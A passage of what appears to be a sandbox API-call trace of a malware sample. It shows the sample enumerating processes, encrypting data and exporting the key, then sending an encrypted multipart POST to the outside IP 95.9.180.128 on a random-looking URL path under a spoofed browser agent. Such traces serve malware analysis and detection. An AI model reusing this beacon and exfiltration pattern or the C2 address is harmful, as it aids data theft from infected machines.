}, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchFilterHost.exe" + }, + { + "name": "ProcessId", + "value": "9956" + } + ], + "repeated": 0, + "id": 2120 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "816" + } + ], + "repeated": 0, + "id": 2121 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2122 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004ec" + } + ], + "repeated": 0, + "id": 2123 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce2f90", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052ac000" + }, + { + "name": "RegionSize", + "value": "0x00056000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2124 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e24c80" + }, + { + "name": "Buffer", + "value": "\\xd5GY\\xc2\\xd7^\\x0b~r\\xef1\\xa5FWg`\\xb6\\xc9\\x1d\\xc2|\\x16\\x89\\xf6^O\\xfc\\xe4>UO\\xbc\\xa8\\x17D\\xbb\\xef\\x9d\\x82\\xff\\xf0\\x15\\xad\\xedd/\\xc44\\x16|\\xf0\\x84rJ\\xd78\n\\xd5\\x1b\\xa4x\\x82\\x03a\\x15\\x97\\x11\\xb9\\xdd)\\x12\\xed\\xd1:Z\\xf9\\x1b\\xa8l \\xe1\\xa9e\\xb68\\x9c\\xf5\\xabH\\xc0\\x9e]gq\\x04o/\\xde\n\\xa5\\xa2\\xab_Tz\\xfcV\\x00\\x8bJ\\x0ck[\\xe0\\xfa\\xe2|#J\\xf5\\xba\\xd9\\x1d\\x9d5\\x13\\xa6\\xca\"\\x13\\x98\\x02T\\xbd7\\xed\\x1c\\xc0\\xe2\\xdc\\xe7\\x1a\\xe5k\\x16\\xb5\\xa8KHd]o\\x02\\xbc\\xd6\\x9e\\xf1u>^,hV\\xfa\\xa9\\x0f\\xdf\\x11\\xb7\\xa8N+_b\\x8dZ-cmCyYo\\x04\\xd5\"\\xa0\\xd1a\\xe7\\xe6\\x9f\\xa6\\x14\\xf36\\xac\\x95\t\\xd9\\xf6\\x8b\\x99\\xac\\xf1\\x19\\xa5\\xf4\\xb3\\xdd\\xd1i\\x8c[\n)\\x87W\\xf8#\\x8f\\x12OE\\xba\\xc5\\xb4\\x1bQ\\xc2\\x14\\x9d\\x1c\t\\xe59\\x12CY.O\\xd0D\\x80\\x06\\x0f\\xfc\\xfc\\x890\\\\x06c\\x1cZ\\xaa" + }, + { + "name": "Length", + "value": "640" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 2125 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00A\\x1d\\xa9\\x17\\xa6'\\xfe_B\\xa8\\xfe\\x95^Z\\xfa|\\xc484F\\xa7\\xeco=\\xaa\\xbb\\x7f\\xfe3M\\x1c\\xfag}\\xc6@0\\x9a\\x1a\\xcc\\xff\\x99\\xcc\r\\xdb9I\\xcb\\x15\\xdb\\xdb\\xb5u\\x8c/\\xce\\xa9J\\xb0\\x8f\\xe0\\x8eB\\x87\\x96\\x08\\xd5\\s\\xc1\\xd4.\\xc5\\x84\\x84_U}d\\xb0\\xfbSo\\xe2\\xf6\\xa5\\xa8\\xbc\\xe7m\\xf1\\xf2\\xaf\\x1a\\xb6\\x07" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 2126 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e24c80" + } + ], + "repeated": 0, + "id": 2127 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 2128 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 2129 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2130 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "95.9.180.128" + }, + { + "name": "ServerPort", + "value": "80" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2131 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "1MrMglUzL5j3fbU5/EuN3bBd6/kczmTPewfVTQppodv/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 2132 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 2133 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x0529ca78" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "h\\xa4)\\x05" + } + ], + "repeated": 0, + "id": 2134 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 2135 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f0" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2136 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000408" + } + ], + "repeated": 0, + "id": 2137 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 2138 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2139 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004e0" + } + ], + "repeated": 0, + "id": 2140 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004dc" + } + ], + "repeated": 0, + "id": 2141 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f0" + } + ], + "repeated": 0, + "id": 2142 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 2143 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "95.9.180.128" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 2144 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x000004d0", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1232" + } + ], + "repeated": 0, + "id": 2145 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004d0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2146 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004d0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00\\x88\\x16t\\x00" + } + ], + "repeated": 0, + "id": 2147 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1232" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 2148 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004d0" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc4\\x1d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2149 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1232" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2150 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004d0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3k\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2151 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004d0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3k\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2152 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1232" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 2153 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "8196", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1232" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "95.9.180.128" + }, + { + "name": "port", + "value": "80" + } + ], + "repeated": 0, + "id": 2154 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "8036", + "caller": "0x7705b596", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "12" + }, + { + "name": "ThreadInformation", + "value": "\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "8036" + } + ], + "repeated": 0, + "id": 2155 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "1956", + "caller": "0x7705b596", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "12" + }, + { + "name": "ThreadInformation", + "value": "\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "1956" + } + ], + "repeated": 0, + "id": 2156 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "1956", + "caller": "0x77041bae", + "parentcaller": "0x7703f73e", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000007c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 1, + "id": 2157 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "8036", + "caller": "0x756b8b4a", + "parentcaller": "0x7513da84", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c8" + } + ], + "repeated": 0, + "id": 2158 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "8036", + "caller": "0x756b8b4a", + "parentcaller": "0x7513db06", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + } + ], + "repeated": 0, + "id": 2159 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "8036", + "caller": "0x7705b5b9", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtTerminateThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x00000000" + }, + { + "name": "ExitStatus", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "0" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2160 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "1956", + "caller": "0x756b8b4a", + "parentcaller": "0x7513da84", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000444" + } + ], + "repeated": 0, + "id": 2161 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "1956", + "caller": "0x756b8b4a", + "parentcaller": "0x7513db06", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + } + ], + "repeated": 0, + "id": 2162 + }, + { + "timestamp": "2025-03-07 22:35:22,594", + "thread_id": "1956", + "caller": "0x7705b5b9", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtTerminateThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x00000000" + }, + { + "name": "ExitStatus", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "0" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2163 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "8196", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 2164 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "8196", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1232" + } + ], + "repeated": 0, + "id": 2165 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "8196", + "caller": "0x733cc064", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 2166 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://95.9.180.128/1MrMglUzL5j3fbU5/EuN3bBd6/kczmTPewfVTQppodv/\r\nContent-Type: multipart/form-data; boundary=---------------------------740296446365463\r\n" + }, + { + "name": "PostData", + "value": "\r\n-----------------------------740296446365463\r\nContent-Disposition: form-data; name=\"SDuEFCWWUQZiozEyfFB\"; filename=\"LoVvVKIagisTykUE\"\r\nContent-Type: application/octet-stream\r\n\r\n\\x07\\xb6\\x1a\\xaf\\xf2\\xf1m\\xe7\\xbc\\xa8\\xa5\\xf6\\xe2oS\\xfb\\xb0d}U_\\x84\\x84\\xc5.\\xd4\\xc1s\\\\xd5\\x08\\x96\\x87B\\x8e\\xe0\\x8f\\xb0J\\xa9\\xce/\\x8cu\\xb5\\xdb\\xdb\\x15\\xcbI9\\xdb\r\\xcc\\x99\\xff\\xcc\\x1a\\x9a0@\\xc6}g\\xfa\\x1cM3\\xfe\\x7f\\xbb\\xaa=o\\xec\\xa7F" + } + ], + "repeated": 0, + "id": 2167 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 2168 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 2169 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 2170 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 2171 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2172 + }, + { + "timestamp": "2025-03-07 22:35:25,610", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "211" + } + ], + "repeated": 0, + "id": 2173 + }, + { + "timestamp": "2025-03-07 22:35:25,829", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2174 + }, + { + "timestamp": "2025-03-07 22:35:25,829", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "270" + } + ], + "repeated": 0, + "id": 2175 + }, + { + "timestamp": "2025-03-07 22:35:26,110", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2176 + }, + { + "timestamp": "2025-03-07 22:35:26,110", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "231" + } + ], + "repeated": 0, + "id": 2177 + }, + { + "timestamp": "2025-03-07 22:35:26,344", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2178 + }, + { + "timestamp": "2025-03-07 22:35:26,344", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "305" + } + ], + "repeated": 0, + "id": 2179 + }, + { + "timestamp": "2025-03-07 22:35:26,657", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2180 + }, + { + "timestamp": "2025-03-07 22:35:26,657", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "298" + } + ], + "repeated": 0, + "id": 2181 + }, + { + "timestamp": "2025-03-07 22:35:26,969", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2182 + }, + { + "timestamp": "2025-03-07 22:35:26,969", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "290" + } + ], + "repeated": 0, + "id": 2183 + }, + { + "timestamp": "2025-03-07 22:35:27,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2184 + }, + { + "timestamp": "2025-03-07 22:35:27,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "267" + } + ], + "repeated": 0, + "id": 2185 + }, + { + "timestamp": "2025-03-07 22:35:27,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2186 + }, + { + "timestamp": "2025-03-07 22:35:27,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": 